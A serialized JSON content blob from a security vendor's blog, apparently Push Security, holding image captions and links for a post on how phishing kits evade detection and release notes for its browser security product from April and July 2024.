19654],{"data":219655,"marks":219656,"value":140307,"nodeType":173},{},[],{"data":219658,"content":219659,"nodeType":178},{},[219660],{"data":219661,"marks":219662,"value":140314,"nodeType":173},{},[],{"data":219664,"content":219665,"nodeType":178},{},[219666],{"data":219667,"marks":219668,"value":140321,"nodeType":173},{},[],{"data":219670,"content":219671,"nodeType":178},{},[219672],{"data":219673,"marks":219674,"value":140328,"nodeType":173},{},[],{"data":219676,"content":219679,"nodeType":312},{"target":219677},{"sys":219678},{"id":140333,"type":317,"linkType":318},[],{"data":219681,"content":219684,"nodeType":312},{"target":219682},{"sys":219683},{"id":140339,"type":317,"linkType":318},[],{"data":219686,"content":219687,"nodeType":178},{},[219688],{"data":219689,"marks":219690,"value":140347,"nodeType":173},{},[],{"data":219692,"content":219693,"nodeType":169},{},[219694],{"data":219695,"marks":219696,"value":140354,"nodeType":173},{},[],{"data":219698,"content":219699,"nodeType":178},{},[219700],{"data":219701,"marks":219702,"value":140361,"nodeType":173},{},[],{"data":219704,"content":219707,"nodeType":312},{"target":219705},{"sys":219706},{"id":140366,"type":317,"linkType":318},[],{"data":219709,"content":219710,"nodeType":178},{},[219711],{"data":219712,"marks":219713,"value":140374,"nodeType":173},{},[],{"data":219715,"content":219716,"nodeType":178},{},[219717],{"data":219718,"marks":219719,"value":140381,"nodeType":173},{},[],{"data":219721,"content":219722,"nodeType":169},{},[219723],{"data":219724,"marks":219725,"value":140388,"nodeType":173},{},[],{"data":219727,"content":219728,"nodeType":178},{},[219729],{"data":219730,"marks":219731,"value":140395,"nodeType":173},{},[],{"data":219733,"content":219734,"nodeType":178},{},[219735,219738,219745],{"data":219736,"marks":219737,"value":140402,"nodeType":173},{},[],{"data":219739,"content":219740,"nodeType":186},{"uri":140405},[219741],{"data":219742,"marks":219743,"value":140405,"nodeType":173},{},[219744],{"type":194},{"data":219746,"marks":219747,"value":140414,"nodeType":173},{},[],{"data":219749,"content":219750,"nodeType":178},{},[219751,219754,219758],{"data":219752,"marks":219753,"value":140421,"nodeType":173},{},[],{"data":219755,"marks":219756,"value":140426,"nodeType":173},{},[219757],{"type":370},{"data":219759,"marks":219760,"value":140430,"nodeType":173},{},[],{"data":219762,"content":219763,"nodeType":169},{},[219764],{"data":219765,"marks":219766,"value":40632,"nodeType":173},{},[],{"data":219768,"content":219769,"nodeType":178},{},[219770],{"data":219771,"marks":219772,"value":140443,"nodeType":173},{},[],{"data":219774,"content":219775,"nodeType":178},{},[219776],{"data":219777,"marks":219778,"value":140450,"nodeType":173},{},[],{"data":219780,"content":219783,"nodeType":312},{"target":219781},{"sys":219782},{"id":140455,"type":317,"linkType":318},[],{"data":219785,"content":219786,"nodeType":178},{},[219787],{"data":219788,"marks":219789,"value":140463,"nodeType":173},{},[],{"data":219791,"content":219792,"nodeType":178},{},[219793,219796,219803],{"data":219794,"marks":219795,"value":140470,"nodeType":173},{},[],{"data":219797,"content":219798,"nodeType":186},{"uri":49844},[219799],{"data":219800,"marks":219801,"value":140478,"nodeType":173},{},[219802],{"type":194},{"data":219804,"marks":219805,"value":140482,"nodeType":173},{},[],{"data":219807,"content":219810,"nodeType":312},{"target":219808},{"sys":219809},{"id":140487,"type":317,"linkType":318},[],{"data":219812,"content":219813,"nodeType":169},{},[219814],{"data":219815,"marks":219816,"value":140495,"nodeType":173},{},[],{"data":219818,"content":219819,"nodeType":178},{},[219820,219823,219827,219830,219837],{"data":219821,"marks":219822,"value":140502,"nodeType":173},{},[],{"data":219824,"marks":219825,"value":140507,"nodeType":173},{},[219826],{"type":370},{"data":219828,"marks":219829,"value":140511,"nodeType":173},{},[],{"data":219831,"content":219832,"nodeType":186},{"uri":9099},[219833],{"data":219834,"marks":219835,"value":140519,"nodeType":173},{},[219836],{"type":194},{"data":219838,"marks":219839,"value":1477,"nodeType":173},{},[],{"data":219841,"content":219842,"nodeType":178},{},[219843],{"data":219844,"marks":219845,"value":140529,"nodeType":173},{},[],{"data":219847,"content":219848,"nodeType":178},{},[219849],{"data":219850,"marks":219851,"value":140536,"nodeType":173},{},[],{"data":219853,"content":219854,"nodeType":178},{},[219855],{"data":219856,"marks":219857,"value":140544,"nodeType":173},{},[219858],{"type":13816},{"entries":219860},{"hyperlink":219861,"inline":219862,"block":219863},[],[],[219864,219868,219871,219878,219884,219890,219897,219904,219911,219918],{"sys":219865,"__typename":15269,"type":15270,"ctaText":219866,"buttonLabel":142998,"buttonColour":72847,"buttonUrl":219867},{"id":140036},"Check out our on-demand webinar to see more ways how AitM toolkits like NakedPages, Tycoon and Evilginx evade detection","https://pushsecurity.com/resources/on-demand-webinar-phish-kit-teardown",{"sys":219869,"__typename":5345,"title":142430,"caption":142431,"layoutMode":118,"file":219870},{"id":129117},{"url":123320,"width":123321,"height":123322},{"sys":219872,"__typename":5345,"title":219873,"caption":219873,"layoutMode":118,"file":219874},{"id":140190}," Turns out encryption is hard for attackers as well",{"url":219875,"width":219876,"height":219877},"https://images.ctfassets.net/y1cdw1ablpvd/6pBPG14eFuJclV4KNtDVtG/1c335e64e4ac779b9bdfbb287e8424c6/image5.png",580,418,{"sys":219879,"__typename":5345,"title":10147,"caption":219880,"layoutMode":118,"file":219881},{"id":140248},"If everything doesn’t go perfectly you end up on example.com instead of the phishing page",{"url":219882,"width":219883,"height":78137},"https://images.ctfassets.net/y1cdw1ablpvd/4ABcdZCFsxrZYSHYpQNZY1/f2d6438d1b53ec2e47e0bfbfec44fe59/image6.png",1422,{"sys":219885,"__typename":5345,"title":219886,"caption":219886,"layoutMode":118,"file":219887},{"id":140299},"The href.li service that hides referrers",{"url":219888,"width":5351,"height":219889},"https://images.ctfassets.net/y1cdw1ablpvd/6lfYLQVz50TRqhfuOE3020/5ca9a4ccee7894769a3b9e39addf5b5c/image7.png",614,{"sys":219891,"__typename":5345,"title":219892,"caption":118,"layoutMode":118,"file":219893},{"id":140333},"URL with a JWT auth parameter:",{"url":219894,"width":219895,"height":219896},"https://images.ctfassets.net/y1cdw1ablpvd/1wFzygwfEek9GamL9NxzXm/d537558134774817d9dc87075cd3db8f/image8.png",1654,660,{"sys":219898,"__typename":5345,"title":219899,"caption":118,"layoutMode":118,"file":219900},{"id":140339},"URL with a JWT auth parameter (2)",{"url":219901,"width":219902,"height":219903},"https://images.ctfassets.net/y1cdw1ablpvd/1m75J16LXvOv3ilKd2PndP/60e24888b30259018d9b36c2171b990b/image3.png",1226,906,{"sys":219905,"__typename":5345,"title":219906,"caption":118,"layoutMode":118,"file":219907},{"id":140366},"Breaking login page signatures",{"url":219908,"width":219909,"height":219910},"https://images.ctfassets.net/y1cdw1ablpvd/5zCs41eAanFqhO8lEqmhSn/4aad92d073bf87a7d03fd7c8901f29e6/image1.png",1935,761,{"sys":219912,"__typename":5345,"title":219913,"caption":118,"layoutMode":118,"file":219914},{"id":140455},"VirusTotal entry for NakedPages URL",{"url":219915,"width":219916,"height":219917},"https://images.ctfassets.net/y1cdw1ablpvd/6f6zM8NSe0UZ0H9ydCDgqi/784b6a8ad40f32835d7e8733010f8ad0/image4.png",1340,277,{"sys":219919,"__typename":15269,"type":15270,"ctaText":219920,"buttonLabel":154894,"buttonColour":152046,"buttonUrl":74693},{"id":140487},"Want to see more ways AitM kits evade detection? Check out Part 2 here.","content:blog:how-aitm-phishing-kits-evade-detection.json","blog/how-aitm-phishing-kits-evade-detection.json","blog/how-aitm-phishing-kits-evade-detection",{"_path":219925,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":219926,"ogImage":118,"summary":219928,"title":189316,"subtitle":118,"metaTitle":219939,"synopsis":189317,"hashTags":118,"publishedDate":189318,"slug":189319,"tagsCollection":219940,"relatedBlogPostsCollection":219946,"authorsCollection":220529,"content":220533,"_id":221004,"_type":5439,"_source":5440,"_file":221005,"_stem":221006,"_extension":5439},"/blog/product-release-july-2024",{"id":188840,"publishedAt":219927},"2024-07-16T13:03:21.658Z",{"json":219929},{"data":219930,"content":219931,"nodeType":165},{},[219932],{"data":219933,"content":219934,"nodeType":178},{},[219935],{"data":219936,"marks":219937,"value":219938,"nodeType":173},{},[],"Our latest development sprint focused on providing important context on the unique telemetry provided by the Push platform; expanding core functionality for both security controls and app management; and adding Arc to our list of supported browsers, so you can continue to deploy Push anywhere your employees like to work.","Push Security new product features for July 2024",{"items":219941},[219942,219944],{"sys":219943,"name":26137},{"id":26136},{"sys":219945,"name":18399},{"id":18398},{"items":219947},[219948,220335],{"__typename":1528,"sys":219949,"content":219950,"title":189751,"synopsis":189752,"hashTags":118,"publishedDate":189753,"slug":189754,"tagsCollection":220327,"authorsCollection":220331},{"id":189332},{"json":219951},{"data":219952,"content":219953,"nodeType":165},{},[219954,219960,220017,220023,220036,220049,220055,220060,220077,220083,220096,220102,220107,220124,220130,220150,220163,220180,220186,220199,220212,220217,220234,220240,220260,220265,220282,220288,220312],{"data":219955,"content":219956,"nodeType":235},{},[219957],{"data":219958,"marks":219959,"value":65066,"nodeType":173},{},[],{"data":219961,"content":219962,"nodeType":250},{},[219963,219972,219981,219990,219999,220008],{"data":219964,"content":219965,"nodeType":254},{},[219966],{"data":219967,"content":219968,"nodeType":178},{},[219969],{"data":219970,"marks":219971,"value":125683,"nodeType":173},{},[],{"data":219973,"content":219974,"nodeType":254},{},[219975],{"data":219976,"content":219977,"nodeType":178},{},[219978],{"data":219979,"marks":219980,"value":24345,"nodeType":173},{},[],{"data":219982,"content":219983,"nodeType":254},{},[219984],{"data":219985,"content":219986,"nodeType":178},{},[219987],{"data":219988,"marks":219989,"value":183755,"nodeType":173},{},[],{"data":219991,"content":219992,"nodeType":254},{},[219993],{"data":219994,"content":219995,"nodeType":178},{},[219996],{"data":219997,"marks":219998,"value":157048,"nodeType":173},{},[],{"data":220000,"content":220001,"nodeType":254},{},[220002],{"data":220003,"content":220004,"nodeType":178},{},[220005],{"data":220006,"marks":220007,"value":189391,"nodeType":173},{},[],{"data":220009,"content":220010,"nodeType":254},{},[220011],{"data":220012,"content":220013,"nodeType":178},{},[220014],{"data":220015,"marks":220016,"value":189401,"nodeType":173},{},[],{"data":220018,"content":220019,"nodeType":235},{},[220020],{"data":220021,"marks":220022,"value":189408,"nodeType":173},{},[],{"data":220024,"content":220025,"nodeType":178},{},[220026,220029,220033],{"data":220027,"marks":220028,"value":189415,"nodeType":173},{},[],{"data":220030,"marks":220031,"value":189420,"nodeType":173},{},[220032],{"type":370},{"data":220034,"marks":220035,"value":189424,"nodeType":173},{},[],{"data":220037,"content":220038,"nodeType":178},{},[220039,220042,220046],{"data":220040,"marks":220041,"value":67566,"nodeType":173},{},[],{"data":220043,"marks":220044,"value":125683,"nodeType":173},{},[220045],{"type":370},{"data":220047,"marks":220048,"value":189438,"nodeType":173},{},[],{"data":220050,"content":220051,"nodeType":178},{},[220052],{"data":220053,"marks":220054,"value":189445,"nodeType":173},{},[],{"data":220056,"content":220059,"nodeType":312},{"target":220057},{"sys":220058},{"id":24862,"type":317,"linkType":318},[],{"data":220061,"content":220062,"nodeType":178},{},[220063,220066,220074],{"data":220064,"marks":220065,"value":37,"nodeType":173},{},[],{"data":220067,"content":220070,"nodeType":1698},{"target":220068},{"sys":220069},{"id":189461,"type":317,"linkType":318},[220071],{"data":220072,"marks":220073,"value":148770,"nodeType":173},{},[],{"data":220075,"marks":220076,"value":37,"nodeType":173},{},[],{"data":220078,"content":220079,"nodeType":235},{},[220080],{"data":220081,"marks":220082,"value":189475,"nodeType":173},{},[],{"data":220084,"content":220085,"nodeType":178},{},[220086,220089,220093],{"data":220087,"marks":220088,"value":167538,"nodeType":173},{},[],{"data":220090,"marks":220091,"value":189486,"nodeType":173},{},[220092],{"type":370},{"data":220094,"marks":220095,"value":189490,"nodeType":173},{},[],{"data":220097,"content":220098,"nodeType":178},{},[220099],{"data":220100,"marks":220101,"value":189497,"nodeType":173},{},[],{"data":220103,"content":220106,"nodeType":312},{"target":220104},{"sys":220105},{"id":189502,"type":317,"linkType":318},[],{"data":220108,"content":220109,"nodeType":178},{},[220110,220113,220121],{"data":220111,"marks":220112,"value":37,"nodeType":173},{},[],{"data":220114,"content":220117,"nodeType":1698},{"target":220115},{"sys":220116},{"id":2148,"type":317,"linkType":318},[220118],{"data":220119,"marks":220120,"value":18605,"nodeType":173},{},[],{"data":220122,"marks":220123,"value":37,"nodeType":173},{},[],{"data":220125,"content":220126,"nodeType":235},{},[220127],{"data":220128,"marks":220129,"value":189527,"nodeType":173},{},[],{"data":220131,"content":220132,"nodeType":178},{},[220133,220136,220140,220143,220147],{"data":220134,"marks":220135,"value":189534,"nodeType":173},{},[],{"data":220137,"marks":220138,"value":189539,"nodeType":173},{},[220139],{"type":370},{"data":220141,"marks":220142,"value":189543,"nodeType":173},{},[],{"data":220144,"marks":220145,"value":189548,"nodeType":173},{},[220146],{"type":370},{"data":220148,"marks":220149,"value":189552,"nodeType":173},{},[],{"data":220151,"content":220152,"nodeType":178},{},[220153,220156,220160],{"data":220154,"marks":220155,"value":189559,"nodeType":173},{},[],{"data":220157,"marks":220158,"value":189564,"nodeType":173},{},[220159],{"type":370},{"data":220161,"marks":220162,"value":1477,"nodeType":173},{},[],{"data":220164,"content":220165,"nodeType":178},{},[220166,220169,220177],{"data":220167,"marks":220168,"value":37,"nodeType":173},{},[],{"data":220170,"content":220173,"nodeType":1698},{"target":220171},{"sys":220172},{"id":114256,"type":317,"linkType":318},[220174],{"data":220175,"marks":220176,"value":148770,"nodeType":173},{},[],{"data":220178,"marks":220179,"value":37,"nodeType":173},{},[],{"data":220181,"content":220182,"nodeType":235},{},[220183],{"data":220184,"marks":220185,"value":189591,"nodeType":173},{},[],{"data":220187,"content":220188,"nodeType":178},{},[220189,220192,220196],{"data":220190,"marks":220191,"value":189598,"nodeType":173},{},[],{"data":220193,"marks":220194,"value":157048,"nodeType":173},{},[220195],{"type":370},{"data":220197,"marks":220198,"value":189606,"nodeType":173},{},[],{"data":220200,"content":220201,"nodeType":178},{},[220202,220205,220209],{"data":220203,"marks":220204,"value":189613,"nodeType":173},{},[],{"data":220206,"marks":220207,"value":189618,"nodeType":173},{},[220208],{"type":370},{"data":220210,"marks":220211,"value":189622,"nodeType":173},{},[],{"data":220213,"content":220216,"nodeType":312},{"target":220214},{"sys":220215},{"id":189627,"type":317,"linkType":318},[],{"data":220218,"content":220219,"nodeType":178},{},[220220,220223,220231],{"data":220221,"marks":220222,"value":37,"nodeType":173},{},[],{"data":220224,"content":220227,"nodeType":1698},{"target":220225},{"sys":220226},{"id":183743,"type":317,"linkType":318},[220228],{"data":220229,"marks":220230,"value":18605,"nodeType":173},{},[],{"data":220232,"marks":220233,"value":37,"nodeType":173},{},[],{"data":220235,"content":220236,"nodeType":235},{},[220237],{"data":220238,"marks":220239,"value":189652,"nodeType":173},{},[],{"data":220241,"content":220242,"nodeType":178},{},[220243,220246,220250,220253,220257],{"data":220244,"marks":220245,"value":189659,"nodeType":173},{},[],{"data":220247,"marks":220248,"value":157095,"nodeType":173},{},[220249],{"type":370},{"data":220251,"marks":220252,"value":189667,"nodeType":173},{},[],{"data":220254,"marks":220255,"value":189672,"nodeType":173},{},[220256],{"type":370},{"data":220258,"marks":220259,"value":189676,"nodeType":173},{},[],{"data":220261,"content":220264,"nodeType":312},{"target":220262},{"sys":220263},{"id":189681,"type":317,"linkType":318},[],{"data":220266,"content":220267,"nodeType":178},{},[220268,220271,220279],{"data":220269,"marks":220270,"value":37,"nodeType":173},{},[],{"data":220272,"content":220275,"nodeType":1698},{"target":220273},{"sys":220274},{"id":2466,"type":317,"linkType":318},[220276],{"data":220277,"marks":220278,"value":18605,"nodeType":173},{},[],{"data":220280,"marks":220281,"value":37,"nodeType":173},{},[],{"data":220283,"content":220284,"nodeType":235},{},[220285],{"data":220286,"marks":220287,"value":189706,"nodeType":173},{},[],{"data":220289,"content":220290,"nodeType":178},{},[220291,220294,220298,220301,220309],{"data":220292,"marks":220293,"value":189713,"nodeType":173},{},[],{"data":220295,"marks":220296,"value":189718,"nodeType":173},{},[220297],{"type":370},{"data":220299,"marks":220300,"value":189722,"nodeType":173},{},[],{"data":220302,"content":220305,"nodeType":1698},{"target":220303},{"sys":220304},{"id":148863,"type":317,"linkType":318},[220306],{"data":220307,"marks":220308,"value":189731,"nodeType":173},{},[],{"data":220310,"marks":220311,"value":189735,"nodeType":173},{},[],{"data":220313,"content":220314,"nodeType":178},{},[220315,220318,220324],{"data":220316,"marks":220317,"value":37,"nodeType":173},{},[],{"data":220319,"content":220320,"nodeType":186},{"uri":183466},[220321],{"data":220322,"marks":220323,"value":18605,"nodeType":173},{},[],{"data":220325,"marks":220326,"value":13836,"nodeType":173},{},[],{"items":220328},[220329],{"sys":220330,"name":18399},{"id":18398},{"items":220332},[220333],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":220334},{"url":19129},{"__typename":1528,"sys":220336,"content":220338,"title":220517,"synopsis":220518,"hashTags":118,"publishedDate":220519,"slug":220520,"tagsCollection":220521,"authorsCollection":220525},{"id":220337},"3xoO1mzZMMQO8Q2vHuYLFt",{"json":220339},{"data":220340,"content":220341,"nodeType":165},{},[220342,220349,220382,220388,220404,220410,220426,220433,220448,220454,220471,220478,220494,220500],{"data":220343,"content":220344,"nodeType":235},{},[220345],{"data":220346,"marks":220347,"value":220348,"nodeType":173},{},[],"Here's what's new on the Push platform this month:",{"data":220350,"content":220351,"nodeType":250},{},[220352,220362,220372],{"data":220353,"content":220354,"nodeType":254},{},[220355],{"data":220356,"content":220357,"nodeType":178},{},[220358],{"data":220359,"marks":220360,"value":220361,"nodeType":173},{},[],"Faster insights with the Push dashboard",{"data":220363,"content":220364,"nodeType":254},{},[220365],{"data":220366,"content":220367,"nodeType":178},{},[220368],{"data":220369,"marks":220370,"value":220371,"nodeType":173},{},[],"Integrate with Okta",{"data":220373,"content":220374,"nodeType":254},{},[220375],{"data":220376,"content":220377,"nodeType":178},{},[220378],{"data":220379,"marks":220380,"value":220381,"nodeType":173},{},[],"App banner acknowledge mode",{"data":220383,"content":220384,"nodeType":235},{},[220385],{"data":220386,"marks":220387,"value":220361,"nodeType":173},{},[],{"data":220389,"content":220390,"nodeType":178},{},[220391,220395,220400],{"data":220392,"marks":220393,"value":220394,"nodeType":173},{},[],"Get an overview of the ",{"data":220396,"marks":220397,"value":220399,"nodeType":173},{},[220398],{"type":370},"actionable insights ",{"data":220401,"marks":220402,"value":220403,"nodeType":173},{},[],"from across your ecosystem of accounts, apps, and identities using the Push dashboard, now available in the Push admin console. Pinpoint vulnerable identities at risk of account takeover, see SSO trends across all accounts, and get a snapshot of your identity inventory.",{"data":220405,"content":220409,"nodeType":312},{"target":220406},{"sys":220407},{"id":220408,"type":317,"linkType":318},"1AbJEm5rHOxwYer519AT9C",[],{"data":220411,"content":220412,"nodeType":178},{},[220413,220416,220423],{"data":220414,"marks":220415,"value":37,"nodeType":173},{},[],{"data":220417,"content":220419,"nodeType":186},{"uri":220418},"/help/audience/administrators/docs/view-saas-apps-and-employee-activity/#dashboard",[220420],{"data":220421,"marks":220422,"value":18605,"nodeType":173},{},[],{"data":220424,"marks":220425,"value":37,"nodeType":173},{},[],{"data":220427,"content":220428,"nodeType":235},{},[220429],{"data":220430,"marks":220431,"value":220432,"nodeType":173},{},[],"Integrate with Okta to enrich your Push data",{"data":220434,"content":220435,"nodeType":178},{},[220436,220439,220444],{"data":220437,"marks":220438,"value":65284,"nodeType":173},{},[],{"data":220440,"marks":220441,"value":220443,"nodeType":173},{},[220442],{"type":370},"integrate with Okta",{"data":220445,"marks":220446,"value":220447,"nodeType":173},{},[]," to sync employee records and pull in a list of your SSO apps to the Push platform, providing a valuable source of truth for data on your workforce accounts and approved apps. By integrating with Okta, you will also be able to capture additional login methods used by employees, such as Okta SWA.",{"data":220449,"content":220453,"nodeType":312},{"target":220450},{"sys":220451},{"id":220452,"type":317,"linkType":318},"2p7QbcSx8G2R8DVpCEZWYk",[],{"data":220455,"content":220456,"nodeType":178},{},[220457,220460,220468],{"data":220458,"marks":220459,"value":37,"nodeType":173},{},[],{"data":220461,"content":220463,"nodeType":186},{"uri":220462},"/help/audience/administrators/docs/add-employees/#integrate-with-okta",[220464],{"data":220465,"marks":220466,"value":220467,"nodeType":173},{},[],"How to integrate",{"data":220469,"marks":220470,"value":37,"nodeType":173},{},[],{"data":220472,"content":220473,"nodeType":235},{},[220474],{"data":220475,"marks":220476,"value":220477,"nodeType":173},{},[],"New ‘Acknowledge’ mode for app banners",{"data":220479,"content":220480,"nodeType":178},{},[220481,220485,220490],{"data":220482,"marks":220483,"value":220484,"nodeType":173},{},[],"You can now configure app banners to show a larger central message and also ",{"data":220486,"marks":220487,"value":220489,"nodeType":173},{},[220488],{"type":370},"require that an end-user acknowledge the message",{"data":220491,"marks":220492,"value":220493,"nodeType":173},{},[]," before proceeding to use an app, providing stronger in-browser guidance. You may wish to use this mode for GenAI apps or to strongly steer employees away from unapproved file-sharing apps, for example.",{"data":220495,"content":220499,"nodeType":312},{"target":220496},{"sys":220497},{"id":220498,"type":317,"linkType":318},"7chqbwof9wgjdc7642zUbf",[],{"data":220501,"content":220502,"nodeType":178},{},[220503,220506,220514],{"data":220504,"marks":220505,"value":37,"nodeType":173},{},[],{"data":220507,"content":220510,"nodeType":1698},{"target":220508},{"sys":220509},{"id":2466,"type":317,"linkType":318},[220511],{"data":220512,"marks":220513,"value":18605,"nodeType":173},{},[],{"data":220515,"marks":220516,"value":37,"nodeType":173},{},[],"Product release: April 2024","Here’s what’s new on the Push platform for April 2024.","2024-04-17T00:00:00.000Z","product-release-april-2024",{"items":220522},[220523],{"sys":220524,"name":18399},{"id":18398},{"items":220526},[220527],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":220528},{"url":19129},{"items":220530},[220531],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":220532},{"url":19129},{"json":220534,"links":220952},{"data":220535,"content":220536,"nodeType":165},{},[220537,220543,220600,220606,220626,220639,220644,220661,220667,220691,220697,220714,220720,220754,220760,220765,220782,220788,220801,220814,220819,220834,220840,220853,220880,220885,220902,220908,220928,220941,220946],{"data":220538,"content":220539,"nodeType":235},{},[220540],{"data":220541,"marks":220542,"value":65066,"nodeType":173},{},[],{"data":220544,"content":220545,"nodeType":250},{},[220546,220555,220564,220573,220582,220591],{"data":220547,"content":220548,"nodeType":254},{},[220549],{"data":220550,"content":220551,"nodeType":178},{},[220552],{"data":220553,"marks":220554,"value":188863,"nodeType":173},{},[],{"data":220556,"content":220557,"nodeType":254},{},[220558],{"data":220559,"content":220560,"nodeType":178},{},[220561],{"data":220562,"marks":220563,"value":188873,"nodeType":173},{},[],{"data":220565,"content":220566,"nodeType":254},{},[220567],{"data":220568,"content":220569,"nodeType":178},{},[220570],{"data":220571,"marks":220572,"value":188883,"nodeType":173},{},[],{"data":220574,"content":220575,"nodeType":254},{},[220576],{"data":220577,"content":220578,"nodeType":178},{},[220579],{"data":220580,"marks":220581,"value":188893,"nodeType":173},{},[],{"data":220583,"content":220584,"nodeType":254},{},[220585],{"data":220586,"content":220587,"nodeType":178},{},[220588],{"data":220589,"marks":220590,"value":188903,"nodeType":173},{},[],{"data":220592,"content":220593,"nodeType":254},{},[220594],{"data":220595,"content":220596,"nodeType":178},{},[220597],{"data":220598,"marks":220599,"value":188913,"nodeType":173},{},[],{"data":220601,"content":220602,"nodeType":235},{},[220603],{"data":220604,"marks":220605,"value":188920,"nodeType":173},{},[],{"data":220607,"content":220608,"nodeType":178},{},[220609,220612,220616,220619,220623],{"data":220610,"marks":220611,"value":188927,"nodeType":173},{},[],{"data":220613,"marks":220614,"value":2718,"nodeType":173},{},[220615],{"type":370},{"data":220617,"marks":220618,"value":188935,"nodeType":173},{},[],{"data":220620,"marks":220621,"value":188940,"nodeType":173},{},[220622],{"type":370},{"data":220624,"marks":220625,"value":188944,"nodeType":173},{},[],{"data":220627,"content":220628,"nodeType":178},{},[220629,220632,220636],{"data":220630,"marks":220631,"value":188951,"nodeType":173},{},[],{"data":220633,"marks":220634,"value":188956,"nodeType":173},{},[220635],{"type":370},{"data":220637,"marks":220638,"value":1477,"nodeType":173},{},[],{"data":220640,"content":220643,"nodeType":312},{"target":220641},{"sys":220642},{"id":183997,"type":317,"linkType":318},[],{"data":220645,"content":220646,"nodeType":178},{},[220647,220650,220658],{"data":220648,"marks":220649,"value":37,"nodeType":173},{},[],{"data":220651,"content":220654,"nodeType":1698},{"target":220652},{"sys":220653},{"id":183305,"type":317,"linkType":318},[220655],{"data":220656,"marks":220657,"value":18605,"nodeType":173},{},[],{"data":220659,"marks":220660,"value":37,"nodeType":173},{},[],{"data":220662,"content":220663,"nodeType":235},{},[220664],{"data":220665,"marks":220666,"value":188988,"nodeType":173},{},[],{"data":220668,"content":220669,"nodeType":178},{},[220670,220673,220677,220680,220688],{"data":220671,"marks":220672,"value":188995,"nodeType":173},{},[],{"data":220674,"marks":220675,"value":189000,"nodeType":173},{},[220676],{"type":370},{"data":220678,"marks":220679,"value":189004,"nodeType":173},{},[],{"data":220681,"content":220684,"nodeType":1698},{"target":220682},{"sys":220683},{"id":189009,"type":317,"linkType":318},[220685],{"data":220686,"marks":220687,"value":3262,"nodeType":173},{},[],{"data":220689,"marks":220690,"value":61717,"nodeType":173},{},[],{"data":220692,"content":220693,"nodeType":178},{},[220694],{"data":220695,"marks":220696,"value":189023,"nodeType":173},{},[],{"data":220698,"content":220699,"nodeType":178},{},[220700,220703,220711],{"data":220701,"marks":220702,"value":37,"nodeType":173},{},[],{"data":220704,"content":220707,"nodeType":1698},{"target":220705},{"sys":220706},{"id":189034,"type":317,"linkType":318},[220708],{"data":220709,"marks":220710,"value":189039,"nodeType":173},{},[],{"data":220712,"marks":220713,"value":37,"nodeType":173},{},[],{"data":220715,"content":220716,"nodeType":235},{},[220717],{"data":220718,"marks":220719,"value":189049,"nodeType":173},{},[],{"data":220721,"content":220722,"nodeType":178},{},[220723,220726,220730,220733,220737,220740,220744,220747,220751],{"data":220724,"marks":220725,"value":189056,"nodeType":173},{},[],{"data":220727,"marks":220728,"value":2740,"nodeType":173},{},[220729],{"type":370},{"data":220731,"marks":220732,"value":1464,"nodeType":173},{},[],{"data":220734,"marks":220735,"value":2748,"nodeType":173},{},[220736],{"type":370},{"data":220738,"marks":220739,"value":189071,"nodeType":173},{},[],{"data":220741,"marks":220742,"value":121096,"nodeType":173},{},[220743],{"type":370},{"data":220745,"marks":220746,"value":189079,"nodeType":173},{},[],{"data":220748,"marks":220749,"value":189084,"nodeType":173},{},[220750],{"type":370},{"data":220752,"marks":220753,"value":1477,"nodeType":173},{},[],{"data":220755,"content":220756,"nodeType":178},{},[220757],{"data":220758,"marks":220759,"value":189094,"nodeType":173},{},[],{"data":220761,"content":220764,"nodeType":312},{"target":220762},{"sys":220763},{"id":189099,"type":317,"linkType":318},[],{"data":220766,"content":220767,"nodeType":178},{},[220768,220771,220779],{"data":220769,"marks":220770,"value":37,"nodeType":173},{},[],{"data":220772,"content":220775,"nodeType":1698},{"target":220773},{"sys":220774},{"id":114387,"type":317,"linkType":318},[220776],{"data":220777,"marks":220778,"value":189115,"nodeType":173},{},[],{"data":220780,"marks":220781,"value":37,"nodeType":173},{},[],{"data":220783,"content":220784,"nodeType":235},{},[220785],{"data":220786,"marks":220787,"value":189125,"nodeType":173},{},[],{"data":220789,"content":220790,"nodeType":178},{},[220791,220794,220798],{"data":220792,"marks":220793,"value":189132,"nodeType":173},{},[],{"data":220795,"marks":220796,"value":189137,"nodeType":173},{},[220797],{"type":370},{"data":220799,"marks":220800,"value":189141,"nodeType":173},{},[],{"data":220802,"content":220803,"nodeType":178},{},[220804,220807,220811],{"data":220805,"marks":220806,"value":189148,"nodeType":173},{},[],{"data":220808,"marks":220809,"value":2718,"nodeType":173},{},[220810],{"type":370},{"data":220812,"marks":220813,"value":189156,"nodeType":173},{},[],{"data":220815,"content":220818,"nodeType":312},{"target":220816},{"sys":220817},{"id":189161,"type":317,"linkType":318},[],{"data":220820,"content":220821,"nodeType":178},{},[220822,220825,220831],{"data":220823,"marks":220824,"value":37,"nodeType":173},{},[],{"data":220826,"content":220827,"nodeType":186},{"uri":189171},[220828],{"data":220829,"marks":220830,"value":189176,"nodeType":173},{},[],{"data":220832,"marks":220833,"value":37,"nodeType":173},{},[],{"data":220835,"content":220836,"nodeType":235},{},[220837],{"data":220838,"marks":220839,"value":189186,"nodeType":173},{},[],{"data":220841,"content":220842,"nodeType":178},{},[220843,220846,220850],{"data":220844,"marks":220845,"value":189193,"nodeType":173},{},[],{"data":220847,"marks":220848,"value":189198,"nodeType":173},{},[220849],{"type":370},{"data":220851,"marks":220852,"value":189202,"nodeType":173},{},[],{"data":220854,"content":220855,"nodeType":178},{},[220856,220859,220863,220866,220870,220873,220877],{"data":220857,"marks":220858,"value":189209,"nodeType":173},{},[],{"data":220860,"marks":220861,"value":189214,"nodeType":173},{},[220862],{"type":370},{"data":220864,"marks":220865,"value":2936,"nodeType":173},{},[],{"data":220867,"marks":220868,"value":189222,"nodeType":173},{},[220869],{"type":370},{"data":220871,"marks":220872,"value":9534,"nodeType":173},{},[],{"data":220874,"marks":220875,"value":189230,"nodeType":173},{},[220876],{"type":370},{"data":220878,"marks":220879,"value":189234,"nodeType":173},{},[],{"data":220881,"content":220884,"nodeType":312},{"target":220882},{"sys":220883},{"id":156868,"type":317,"linkType":318},[],{"data":220886,"content":220887,"nodeType":178},{},[220888,220891,220899],{"data":220889,"marks":220890,"value":37,"nodeType":173},{},[],{"data":220892,"content":220895,"nodeType":1698},{"target":220893},{"sys":220894},{"id":189250,"type":317,"linkType":318},[220896],{"data":220897,"marks":220898,"value":18605,"nodeType":173},{},[],{"data":220900,"marks":220901,"value":37,"nod